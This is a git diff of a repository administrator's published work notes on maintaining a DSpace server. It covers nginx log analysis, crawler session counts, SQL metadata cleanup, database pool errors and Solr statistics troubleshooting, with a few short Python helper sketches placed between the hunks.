    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &> systemoffice.log
     
    • The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.
    • @@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
    • Linode alerted that CGSpace was using high CPU this morning around 6 AM
    • I’m playing with reading all of a month’s nginx logs into goaccess:
    -
    # find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | goaccess --log-format=COMBINED -
    +
    # find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | goaccess --log-format=COMBINED -
     
    • I can see interesting things using this approach, for example:
        @@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
        • Looking at some old notes for metadata to clean up, I found a few hundred corrections in cg.fulltextstatus and dc.language.iso:
        -
        # update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
        +
        # update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
         UPDATE 5
        -# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
        +# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
         DELETE 17
        -# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
        +# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
         UPDATE 49
        -# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
        +# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
         UPDATE 4
        -# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
        +# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
         UPDATE 16
        -# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
        +# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
         UPDATE 9
        -# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
        +# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
         UPDATE 1
        -# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
        +# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
         UPDATE 5
        -# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
        +# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
         DELETE 20
         
        • I need to figure out why we have records with the language “in”, because that’s not a language!
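The corrections above rely on PostgreSQL's `~` operator, which matches a pattern such as `(En|English)` anywhere in the value, so a string that merely contains "En" would also be rewritten. A minimal Python sketch of the same mapping with anchored matching follows. `LANGUAGE_FIXES` and `normalize_language` are hypothetical names for illustration and are not part of DSpace, and the questionable "in" code is deliberately left out:

```python
import re

# Hypothetical table mirroring the SQL updates above (illustration only).
# Each pattern is applied with fullmatch(), so the whole value must match.
LANGUAGE_FIXES = [
    (re.compile(r"En|English"), "en"),
    (re.compile(r"fre|frn|French"), "fr"),
    (re.compile(r"Spanish|spa"), "es"),
    (re.compile(r"Vietnamese"), "vi"),
    (re.compile(r"Ru"), "ru"),
]


def normalize_language(value):
    """Return the corrected code, or the value unchanged if nothing matches."""
    for pattern, code in LANGUAGE_FIXES:
        if pattern.fullmatch(value):
            return code
    return value
```

Running candidate values through a function like this before touching the database is one way to preview which rows an anchored pattern would change.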
        • @@ -735,7 +735,7 @@ DELETE 20
        • Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM
        • Here are the XMLUI logs:
        -
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "30/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        +
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "30/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
             637 207.46.13.106
             641 157.55.39.186
             715 68.180.229.254
        @@ -751,7 +751,7 @@ DELETE 20
         
      • They identify as “com.plumanalytics”, which Google says is associated with Elsevier
      • They only seem to have used one Tomcat session so that’s good, I guess I don’t need to add them to the Tomcat Crawler Session Manager valve:
      -
      $ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +
      $ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       1
       
      • 216.244.66.245 seems to be moz.com’s DotBot
      • diff --git a/docs/2018-01/index.html b/docs/2018-01/index.html
      index 10c83907d..15b667798 100644
      --- a/docs/2018-01/index.html
      +++ b/docs/2018-01/index.html
      @@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
       I notice this error quite a few times in dspace.log:
       2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
       And there are many of these errors every day for the past month:
      -$ grep -c "Error while searching for sidebar facets" dspace.log.*
      +$ grep -c "Error while searching for sidebar facets" dspace.log.*
       dspace.log.2017-11-21:4
       dspace.log.2017-11-22:1
       dspace.log.2017-11-23:4
      @@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
       I notice this error quite a few times in dspace.log:
       2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
       And there are many of these errors every day for the past month:
      -$ grep -c "Error while searching for sidebar facets" dspace.log.*
      +$ grep -c "Error while searching for sidebar facets" dspace.log.*
       dspace.log.2017-11-21:4
       dspace.log.2017-11-22:1
       dspace.log.2017-11-23:4
      @@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
       Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains
       "/>
      -
      +
      @@ -252,11 +252,11 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
      • I notice this error quite a few times in dspace.log:
      2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
       
      • And there are many of these errors every day for the past month:
      -
      $ grep -c "Error while searching for sidebar facets" dspace.log.*
      +
      $ grep -c "Error while searching for sidebar facets" dspace.log.*
       dspace.log.2017-11-21:4
       dspace.log.2017-11-22:1
       dspace.log.2017-11-23:4
      @@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
       
    • I woke up to more ups and downs on CGSpace: this time UptimeRobot noticed a few rounds of downtime lasting a few minutes each, and Linode also sent a notification about high CPU load from 12 to 2 PM
    • Looks like I need to increase the database pool size again:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
     
    • The active IPs in XMLUI are:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         607 40.77.167.141
         611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
         663 188.226.169.37
    @@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
     
  • This appears to be the Internet Archive’s open source bot
  • They seem to be re-using their Tomcat session so I don’t need to do anything to them just yet:
  • -
    $ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     2
     
    • The API logs show the normal users:
    -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          32 207.46.13.182
          38 40.77.167.132
          38 68.180.229.254
    @@ -361,7 +361,7 @@ dspace.log.2018-01-03:1909
     
    • But they come from hundreds of IPs, many of which are 54.x.x.x:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
           9 54.144.87.92
           9 54.146.222.143
           9 54.146.249.249
    @@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
     
  • CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot
  • The XMLUI logs show this activity:
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "4/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "4/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         968 197.211.63.81
         981 213.55.99.121
        1039 66.249.64.93
    @@ -421,7 +421,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
    • So for this week that is the number one problem!
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
     
  • Peter said that CGSpace was down last night and Tsega restarted Tomcat
  • I don’t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:
  • -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
     dspace.log.2018-01-01:0
     dspace.log.2018-01-02:1972
     dspace.log.2018-01-03:1909
    @@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
     
  • Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space
  • I had a look and there is one Apache 2 log file that is 73GB, with lots of this:
  • -
    [Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for "9-16-1-RV.doc" in "/home/files/journals/6//articles/9/". Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
    +
    [Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for "9-16-1-RV.doc" in "/home/files/journals/6//articles/9/". Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
     
    • I will delete the log file for now and tell Danny
    • Also, I’m still seeing a hundred or so of the “ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer” errors in the DSpace logs, so I need to search the dspace-tech mailing list to see what the cause is
    • I will run a full Discovery reindex in the meantime to see if it’s something wrong with the Discovery Solr core
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
     
     real    110m43.985s
    @@ -465,7 +465,7 @@ sys     3m14.890s
     
    • I’m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:
    -
    org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered " "]" "] "" at line 1, column 32.
    +
    org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered " "]" "] "" at line 1, column 32.
     
    • I posted a message to the dspace-tech mailing list to see if anyone can help
    @@ -474,7 +474,7 @@ sys 3m14.890s
  • Advise Sisay about blank lines in some IITA records
  • Generate a list of author affiliations for Peter to clean up:
  • -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 4515
     

    2018-01-10

      @@ -553,10 +553,10 @@ Caused by: org.apache.http.client.ClientProtocolException
    • I can apparently search for records in the Solr stats core that have an empty owningColl field using this in the Solr admin query: -owningColl:*
    • On CGSpace I see 48,000,000 records that have an owningColl field and 34,000,000 that don’t:
    -
    $ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&wt=json&indent=true' | grep numFound 
    -  "response":{"numFound":48476327,"start":0,"docs":[
    -$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":34879872,"start":0,"docs":[
    +
    $ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&wt=json&indent=true' | grep numFound 
    +  "response":{"numFound":48476327,"start":0,"docs":[
    +$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":34879872,"start":0,"docs":[
     
    • I tested the dspace stats-util -s process on my local machine and it failed the same way
    • It doesn’t seem to be helpful, but the dspace log shows this:
    • @@ -568,12 +568,12 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=js
    • Uptime Robot said that CGSpace went down at around 9:43 AM
    • I looked at PostgreSQL’s pg_stat_activity table and saw 161 active connections, but no pool errors in the DSpace logs:
    -
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-10 
    +
    $ grep -c "Timeout: Pool empty." dspace.log.2018-01-10 
     0
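The per-day `grep -c` check used throughout these notes can be approximated in Python when the counts need further processing. This is a minimal sketch under stated assumptions: `count_pool_errors` is a hypothetical helper, the log directory is whatever holds the `dspace.log.*` files, and the needle is matched as a literal string (in `grep` the trailing `.` is a regex wildcard):

```python
from pathlib import Path


def count_pool_errors(log_dir, pattern="dspace.log.2018-01-*",
                      needle="Timeout: Pool empty."):
    """Count lines containing the needle in each matching log file."""
    counts = {}
    for path in sorted(Path(log_dir).glob(pattern)):
        # errors="replace" keeps odd bytes in the logs from aborting the scan
        with path.open(encoding="utf-8", errors="replace") as handle:
            counts[path.name] = sum(1 for line in handle if needle in line)
    return counts
```

The result is a dictionary keyed by file name, which makes it easy to spot the days on which the pool was exhausted.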
     
    • The XMLUI logs show quite a bit of activity today:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         951 207.46.13.159
         954 157.55.39.123
        1217 95.108.181.88
    @@ -587,18 +587,18 @@ $ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=js
     
    • The user agents for the top six or so IPs are all the same:
    -
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
    +
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
     
    • whois says they come from Perfect IP
    • I’ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:
    -
    $ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     49096
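The session count above comes from extracting every `session_id=` token on lines that mention one of the client addresses and counting the distinct values. A rough Python equivalent, assuming the log lines are already available as an iterable of strings; `count_sessions` is a hypothetical helper, and it uses plain substring matching for the addresses, so like the unescaped dots in the `grep` pattern it can over-match (for example `70.36.107.49` inside `170.36.107.49`):

```python
import re

# Same token shape as the grep pattern: 32 upper-case alphanumerics
SESSION_RE = re.compile(r"session_id=([A-Z0-9]{32})")


def count_sessions(lines, clients):
    """Count distinct session IDs on lines mentioning any of the clients."""
    sessions = set()
    for line in lines:
        if any(client in line for client in clients):
            sessions.update(SESSION_RE.findall(line))
    return len(sessions)
```

A client that re-uses its session yields a count of one or two, while a badly behaved crawler produces a count close to its number of requests.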
     
    • Rather than blocking their IPs, I think I might just add their user agent to the “badbots” zone with Baidu, because they seem to be the only ones using that user agent:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
    -/537.36" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
    +/537.36" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        6796 70.36.107.50
       11870 70.36.107.190
       17323 70.36.107.49
    @@ -637,19 +637,19 @@ cache_alignment : 64
     
  • Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates
  • Following up with the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat localhost_access_log at the time of my sharding attempt on my test machine:
  • -
    127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-18YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 447
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 76
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 2137630
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16253
    -127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&
f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    +
    127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-18YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 447
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 76
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 2137630
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16253
    +127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&
